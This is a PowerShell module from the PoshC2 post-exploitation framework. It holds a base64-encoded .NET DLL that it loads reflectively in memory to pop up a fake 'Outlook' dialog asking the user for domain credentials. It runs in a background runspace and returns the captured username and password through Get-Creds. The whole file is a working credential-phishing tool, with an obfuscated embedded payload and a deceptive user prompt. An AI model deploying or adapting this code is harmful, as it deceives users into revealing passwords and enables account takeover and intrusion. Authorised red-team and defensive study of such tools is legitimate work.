PoshC2_Python/Modules/Cred-Popper.ps1


function Cred-Popper($title="Outlook", $caption="Please Enter Your Domain Credentials", $minlengthpassword=1) {
$scriptblock = @"
`$PS = "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VkFMSURfQUNDT1VOVF9OQU1FAFJFUVVJUkVfQ0VSVElGSUNBVEUAQUxXQVlTX1NIT1dfVUkAY3JlZGl0VUkAUEFTU1dPUkRfT05MWV9PSwBTRVJWRVJfQ1JFREVOVElBTABNQVhfRE9NQUlOAEVSUk9SX05PX1NVQ0hfTE9HT05fU0VTU0lPTgBFWFBFQ1RfQ09ORklSTUFUSU9OAENSRURVSV9JTkZPAEVSUk9SX0lOU1VGRklDSUVOVF9CVUZGRVIARVJST1JfSU5WQUxJRF9QQVJBTUVURVIATk9fRVJST1IAUkVRVUVTVF9BRE1JTklTVFJBVE9SAGNyZWRpdFVSAEVYQ0xVREVfQ0VSVElGSUNBVEVTAEVSUk9SX0lOVkFMSURfRkxBR1MAQ1JFRFVJX0ZMQUdTAEdFTkVSSUNfQ1JFREVOVElBTFMAVVNFUk5BTUVfVEFSR0VUX0NSRURFTlRJQUxTAEVSUk9SX0JBRF9BUkdVTUVOVFMARE9fTk9UX1BFUlNJU1QAQ3JlZFVJUHJvbXB0Rm9yQ3JlZGVudGlhbHNXAFNIT1dfU0FWRV9DSEVDS19CT1gAdmFsdWVfXwBtc2NvcmxpYgBBcHBlbmQAbWF4UGFzc3dvcmQAbWlubGVuZ3RocGFzc3dvcmQAdGl0bGUAZ2V0X1VzZXJEb21haW5OYW1lAGdldF9Vc2VyTmFtZQBtYXhVc2VyTmFtZQB1c2VyTmFtZQB0YXJnZXROYW1lAFZhbHVlVHlwZQBHdWlkQXR0cmlidXRlAERlYnVnZ2Fi
bGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGUAQXNzZW1ibHlDb25maWd1cmF0aW9uQXR0cmlidXRlAEFzc2VtYmx5RGVzY3JpcHRpb25BdHRyaWJ1dGUARmxhZ3NBdHRyaWJ1dGUAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBBc3NlbWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlDb21wYW55QXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAHBmU2F2ZQBzYXZlAGNiU2l6ZQBTaXplT2YAVG9TdHJpbmcAZ2V0X0xlbmd0aABjcmVkdWkATWFyc2hhbABkbGxtYWluLmRsbABDcmVkLVBvcHBlci5kbGwAU2VjdXJlWmVyb01lbQBTeXN0ZW0ARW51bQBTeXN0ZW0uUmVmbGVjdGlvbgBjYXB0aW9uAFplcm8AU3RyaW5nQnVpbGRlcgBoYm1CYW5uZXIAQ3JlZC1Qb3BwZXIAQ3JlZFBvcHBlcgBpRXJyb3IAbmV0RXJyb3IALmN0b3IASW50UHRyAHB0cgBTeXN0ZW0uRGlhZ25vc3RpY3MAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAQ3JlZFVJUmV0dXJuQ29kZXMARGVidWdnaW5nTW9kZXMAZmxhZ3MAUHJvbXB0Rm9yQ3JlZGVudGlhbHMAQ29uY2F0AE9iamVjdABjbnQARW52aXJvbm1lbnQAaHduZFBhcmVudABDcmVkZW50aWFsc1Byb21wdABTeXN0ZW0uVGV4dABwc3pNZXNzYWdlVGV4dABwc3pDYXB0aW9uVGV4dAAAA1wAAAEABQ0ACgAAAAAAlYPRf9+ak0SqGY1wQ7NhWgAEIAEBCAMgAAEFIAEBEREEIAEBDgQgAQECCgcGDhEMERACDg4DAAAOBgADDg4ODgoHBBJBEkESQREUBSABEkEOBAABCBwCBhgD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SQBuAGYAbwAAAGgCAAABADAAMAAwADAAMAA0AGIAMAAAABoAAQABAEMAbwBtAG0AZQBuAHQAcwAAAAAAAAAiAAEAAQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUAAAAAAAAAAABAAAwAAQBGAGkAbABlAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAAAAAAQwByAGUAZAAtAFAAbwBwAHAAZQByAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAAxAC4AMAAuADAALgAwAAAAQAAQAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABDAHIAZQBkAC0AUABvAHAAcABlAHIALgBkAGwAbAAAAEgAEgABAEwAZQBnAGEAbABDAG8AcAB5AHIAaQBnAGgAdAAAAEMAbwBwAHkAcgBpAGcAaAB0ACAAqQAgACAAMgAwADEAOAAAACoAAQABAEwAZQBnAGEAbABUAHIAYQBkAGUAbQBhAHIAawBzAAAAAAAAAAAASAAQAAEATwByAGkAZwBpAG4AYQBsAEYAaQBsAGUAbgBhAG0AZQAAAEMAcgBlAGQALQBQAG8AcABwAGUAcgAuAGQAbABsAAAAOAAMAAEAUAByAG8AZAB1AGMAdABOAGEAbQBlAAAAAABDAHIAZQBkAC0AUABvAHAAcABlAHIAAAA0AAgAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAAxAC4AMAAuADAALgAwAAAAOAAIAAEAQQBzAHMAZQBtAGIAbAB5ACAAVgBlAHIA
cwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAAAwAAAA0MAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="
`$DllBytes = [System.Convert]::FromBase64String(`$PS)
`$Assembly = [System.Reflection.Assembly]::Load(`$DllBytes)
`$sessionstate.log = [CredentialsPrompt]::CredPopper("$title", "$caption",$minlengthpassword)
"@
$global:sessionstate = [HashTable]::Synchronized(@{})
$sessionstate.log = New-Object System.Collections.ArrayList
$HTTP_runspace = [RunspaceFactory]::CreateRunspace()
$HTTP_runspace.Open()
$HTTP_runspace.SessionStateProxy.SetVariable('sessionstate',$sessionstate)
$HTTP_powershell = [PowerShell]::Create()
$HTTP_powershell.Runspace = $HTTP_runspace
$HTTP_powershell.AddScript($scriptblock) > $null
$HTTP_powershell.BeginInvoke() > $null
echo ""
echo "[+] Cred-Popper started in background runspace"
echo ""
echo "Run Get-Creds to obtain the output, when the user enters their credentials"
echo ""
}
function Get-Creds {
# Emits a blank line, a banner, and the current value of $sessionstate.log.
# $sessionstate is the global synchronized hashtable created by Cred-Popper; until the
# background script has assigned a result, .log is still the empty ArrayList set there.
# The value is written to the output stream as-is, so it ends up wherever the caller's
# output is captured or logged.
Write-Output ""
Write-Output "[+] Cred-Popper data:"
Write-Output $sessionstate.log
}